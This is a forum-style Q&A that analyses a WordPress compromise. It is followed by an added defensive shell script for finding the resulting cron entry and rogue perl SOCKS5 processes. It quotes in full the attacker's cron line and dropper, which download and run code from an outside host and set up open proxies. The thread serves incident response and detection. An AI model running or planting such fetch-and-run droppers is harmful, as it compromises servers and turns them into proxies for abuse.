Some of the malware appearing on our site is associated with a recent WordPress attack
Apparently the site I volunteer for was one of several thousand sites targeted by a recent hack that exploited some vulnerability in WordPress. The result of the compromise was a cron job added to the site:
0 */48 * * * cd /tmp;wget clintonandersonperformancehorses.com/test/test;bash test;cd /tmp;rm -rf test
The file it was pulling is this (obviously, don't try this...):
killall -9 perl
cd /tmp
wget clintonandersonperformancehorses.com/test/stest.tar
tar -vxf stest.tar
rm -rf stest.tar
cd stest
sh getip >>bug.txt
/sbin/ifconfig |grep "inet addr" |grep -v 127.0.0 |grep -v \:.192\. |awk -F ':' '{print $2}' |awk -F ' ' '{print $1}' >>bug.txt
cat bug.txt |sort |uniq >clean.txt
rm -rf bug.txt
bash mbind clean.txt
bash binded.txt
cd ..
rm -rf stest
I was hoping someone could tell me what it is doing. I've cleared the cron job and will follow any other advice I can get to secure the site again, but I'm worried that additional damage might have been done that isn't as obvious. I just can't figure out what this file was actually doing.
I just can't figure out what this file was actually doing.
Short description
In short, it kills all perl processes and then starts SOCKS5 servers on all external IP addresses of the machine.
In depth
Let's go through the script piece by piece:
killall -9 perl
This kills all perl processes.
cd /tmp
wget clintonandersonperformancehorses.com/test/stest.tar
tar -vxf stest.tar
rm -rf stest.tar
cd stest
The above downloads the file stest.tar, unpacks it into the directory /tmp/stest, deletes the tar file and moves into the directory where the downloaded files now are.
sh getip >>bug.txt
getip, a script that is part of stest.tar, uses icanhazip.com to find your public IP address and stores it in the file bug.txt.
/sbin/ifconfig |grep "inet addr" |grep -v 127.0.0 |grep -v \:.192\. |awk -F ':' '{print $2}' |awk -F ' ' '{print $1}' >>bug.txt
cat bug.txt |sort |uniq >clean.txt
rm -rf bug.txt
The above uses ifconfig to check for any other non-local IP addresses your computer is responding on and adds them to bug.txt. Duplicates are removed and the final list of your public IP addresses is saved in the file clean.txt.
bash mbind clean.txt
This is the meat of the script. mbind, which is part of stest.tar, runs the script inst on every IP in clean.txt. For that IP address, inst, which is also included in stest.tar, picks a port at random and runs a copy of "Simple SOCKS5 Server for Perl" on that IP address and port.
Specifically, the SOCKS server that runs is version 1.4 of the Simple Socks Server for Perl, which can be downloaded from the original release. The version used here differs from the SourceForge release only in minor respects: the help message is suppressed, the md5 option is removed, and the IP and port are embedded in the script rather than passed on the command line. I suspect the purpose of the last change is that the command line looks relatively harmless when viewed with a utility like ps.
bash binded.txt
The script binded.txt is created by inst. It appears to do validation against the SOCKS5 server.
cd ..
rm -rf stest
The last part just cleans up. It removes all the downloaded files and the temporary files generated by the scripts.
How to determine if another SOCKS server is running
The script inst (part of the .tar file) starts each SOCKS server with the command:
/usr/bin/perl httpd
To check whether any are still running, look at the output of ps wax and see whether this command appears. If it does, use the kill command to stop it.
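The following triage script is an added example and is not part of the original question or answer. It covers both persistence points the thread describes: the fetch-and-run cron entry from the question, and the "/usr/bin/perl httpd" SOCKS processes the answer says to look for in ps wax. Each helper reads text on standard input, so it can be fed live output from crontab -l, ps wax or ss -ltnp, or captured copies of those for offline review. The cron sample reuses the line from the question; the process IDs, the address 203.0.113.7 and the port 41233 in the other samples are constructed for illustration, and the ss -ltnp column layout is the one modern iproute2 prints.

```shell
#!/bin/sh
# Added triage example (not from the original post). Helpers read stdin so
# they work on live command output or on captured text for offline review.

# Cron lines that download something and immediately execute it with bash
# or sh: the "wget ...;bash ..." pattern from the question. Comment lines
# are skipped; "|| :" keeps a no-match exit status from tripping "set -e".
suspicious_cron_lines() {
    grep -v '^[[:space:]]*#' \
    | grep -E '(wget|curl)[^;|&]*[;|&]+[^;|&]*(bash|sh)[[:space:]]' || :
}

# PIDs of "perl httpd" processes, which is how inst launches each SOCKS
# server. ps wax prints PID TTY STAT TIME COMMAND, so the command is $5.
perl_httpd_pids() {
    awk '$5 ~ /perl$/ && $6 == "httpd" { print $1 }'
}

# Listening sockets owned by perl, from "ss -ltnp" (iproute2 layout assumed).
# The port is chosen at random, so match on the owning process, not the port.
perl_listeners() {
    awk '/users:\(\("perl"/ { print $4 }'
}

# Constructed samples. The cron line is the one from the question; the PIDs,
# the address 203.0.113.7 and the port 41233 are made up for illustration.
SAMPLE_CRON='# m h  dom mon dow   command
0 3 * * * /usr/bin/certbot renew --quiet
0 */48 * * * cd /tmp;wget clintonandersonperformancehorses.com/test/test;bash test;cd /tmp;rm -rf test'

SAMPLE_PS='  PID TTY      STAT   TIME COMMAND
    1 ?        Ss     0:03 /sbin/init
 2041 ?        S      0:00 /usr/bin/perl httpd
 2077 ?        S      0:00 /usr/bin/perl httpd
 2103 pts/0    R+     0:00 ps wax'

SAMPLE_SS='State  Recv-Q Send-Q Local Address:Port   Peer Address:Port Process
LISTEN 0      128    0.0.0.0:22           0.0.0.0:*         users:(("sshd",pid=812,fd=3))
LISTEN 0      5      203.0.113.7:41233    0.0.0.0:*         users:(("perl",pid=2041,fd=3))'

# Demo on the samples. On a live box replace the printf with the real
# command, e.g.:  ps wax | perl_httpd_pids | xargs kill
echo "== fetch-and-run cron entries =="
printf '%s\n' "$SAMPLE_CRON" | suspicious_cron_lines
echo "== perl httpd PIDs (kill these) =="
printf '%s\n' "$SAMPLE_PS" | perl_httpd_pids
echo "== sockets still held by perl =="
printf '%s\n' "$SAMPLE_SS" | perl_listeners
```

Run the cron check against every crontab that can fire on the host, not just the web user's: crontab -l -u www-data, /etc/crontab, /etc/cron.d/* and /var/spool/cron/*. Because the dropper deletes /tmp/stest after itself, the cron entry and the running perl processes are the only artifacts that persist, which is why the process and socket checks matter more than searching the filesystem.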